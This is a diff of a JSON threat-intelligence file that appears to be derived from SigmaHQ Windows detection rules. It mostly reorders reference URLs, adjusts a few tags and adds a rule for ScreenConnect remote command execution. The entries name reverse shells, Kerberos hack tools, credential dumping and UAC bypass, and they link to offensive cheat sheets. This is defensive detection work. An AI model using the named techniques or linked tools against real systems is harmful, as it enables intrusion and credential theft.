"https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ @@ -44594,9 +44662,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/hfiref0x/UACME", "https://twitter.com/hFireF0X/status/897640081053364225", "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml" ], @@ -44679,8 +44747,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1535431474429808642", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml" ], "tags": [ @@ -44755,9 +44823,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product", - "https://www.yeahhub.com/list-installed-programs-version-path-windows/", "https://thedfirreport.com/2023/03/06/2022-year-in-review/", + "https://www.yeahhub.com/list-installed-programs-version-path-windows/", + "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml" ], "tags": [ @@ -44790,9 +44858,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://mez0.cc/posts/cobaltstrike-powershell-exec/", "https://redcanary.com/blog/yellow-cockatoo/", + "https://mez0.cc/posts/cobaltstrike-powershell-exec/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://zero2auto.com/2020/05/19/netwalker-re/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" ], @@ -45235,9 +45303,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/blog/lnk-between-browsers", - "https://redcanary.com/blog/chromeloader/", "https://emkc.org/s/RJjuLa", + "https://redcanary.com/blog/chromeloader/", + "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml" ], "tags": [ @@ -45270,8 +45338,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml" ], "tags": [ @@ -45394,16 +45462,16 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml" ], "tags": [ @@ -45436,9 +45504,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery", "https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf", "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/", - "https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml" ], "tags": [ @@ -45471,8 +45539,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://twitter.com/0gtweet/status/1457676633809330184", + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" ], "tags": [ @@ -45505,9 +45573,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml" ], "tags": [ @@ -45540,8 +45608,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" ], "tags": [ @@ -45583,8 +45651,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1638069413717975046", "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend", + "https://twitter.com/0gtweet/status/1638069413717975046", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml" ], "tags": [ @@ -45684,9 +45752,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml" ], "tags": [ @@ -45770,6 +45838,39 @@ "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "value": "Suspicious Encoded PowerShell Command Line" }, + { + "description": "Detects the execution of a system command via the ScreenConnect RMM service.", + "meta": { + "author": "Ali Alwashali", + "creation_date": "2023/10/10", + "falsepositive": [ + "Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used." + ], + "filename": "proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/pull/4467", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b1f73849-6329-4069-bc8f-78a604bb8b23", + "value": "Remote Access Tool - ScreenConnect Remote Command Execution" + }, { "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", "meta": { @@ -45936,9 +46037,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://twitter.com/0gtweet/status/1628720819537936386", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml" ], "tags": [ @@ -45971,9 +46072,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://linux.die.net/man/1/bash", "Internal Research", "https://lolbas-project.github.io/lolbas/Binaries/Bash/", - "https://linux.die.net/man/1/bash", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_file_execution.yml" ], "tags": [ @@ -46006,8 +46107,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/", "https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml" ], "tags": [ @@ -46139,9 +46240,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", "https://twitter.com/bryon_/status/975835709587075072", "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml" ], "tags": [ @@ -46316,10 +46417,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://twitter.com/splinter_code/status/1483815103279603714", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml" ], "tags": [ @@ -46437,9 +46538,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/GhostPack/Rubeus", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", + "https://github.com/GhostPack/Rubeus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml" ], "tags": [ @@ -46555,10 +46656,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml" ], "tags": [ @@ -46633,8 +46734,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", + "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml" ], "tags": [ @@ -46676,8 +46777,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl", + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml" ], "tags": [ @@ -46778,8 +46879,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", + "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml" ], "tags": [ @@ -47038,12 +47139,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/dsacls.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://ss64.com/nt/dsacls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -47072,8 +47173,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml" ], "tags": [ @@ -47122,8 +47223,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml" ], "tags": [ @@ -47236,8 +47337,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml" ], "tags": [ @@ -47420,10 +47521,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://twitter.com/splinter_code/status/1483815103279603714", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml" ], "tags": [ @@ -47458,8 +47559,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md", - "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml" ], "tags": [ @@ -47494,9 +47595,9 @@ "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://twitter.com/EricaZelic/status/1614075109827874817", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml" ], "tags": [ @@ -47545,8 +47646,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://redcanary.com/blog/gootloader/", + "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_dropper.yml" ], "tags": [ @@ -47655,13 +47756,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/999090532839313408", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://twitter.com/pabraeken/status/995837734379032576", + "https://twitter.com/pabraeken/status/999090532839313408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -47793,8 +47894,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", - "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", + "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml" ], "tags": [ @@ -47817,9 +47918,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml" ], "tags": [ @@ -47852,8 +47953,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/", "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md", + "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/", "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml" ], @@ -47888,8 +47989,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.uptycs.com/blog/lolbins-are-no-laughing-matter", "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", + "https://www.uptycs.com/blog/lolbins-are-no-laughing-matter", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" ], "tags": [ @@ -47989,9 +48090,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/right-to-left-override/", - "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method", "https://unicode-explorer.com/c/202E", + "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method", + "https://redcanary.com/blog/right-to-left-override/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml" ], "tags": [ @@ -48024,9 +48125,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml" ], "tags": [ @@ -48067,10 +48168,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", - "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", + "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", + "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml" ], "tags": [ @@ -48103,8 +48204,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml" ], "tags": [ @@ -48170,14 +48271,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/issues/3742", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ @@ -48220,8 +48321,8 @@ "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], "tags": [ @@ -48254,8 +48355,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml" ], "tags": [ @@ -48354,8 +48455,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/cmd.html", "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml" ], "tags": [ @@ -48388,8 +48489,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" ], "tags": [ @@ -48577,10 +48678,10 @@ "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", - "https://twitter.com/vysecurity/status/885545634958385153", - "https://twitter.com/Hexacorn/status/885570278637678592", "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/Hexacorn/status/885570278637678592", "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques", + "https://twitter.com/vysecurity/status/885545634958385153", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml" ], "tags": [ @@ -48739,12 +48840,12 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://ss64.com/nt/dsacls.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://ss64.com/nt/dsacls.html", 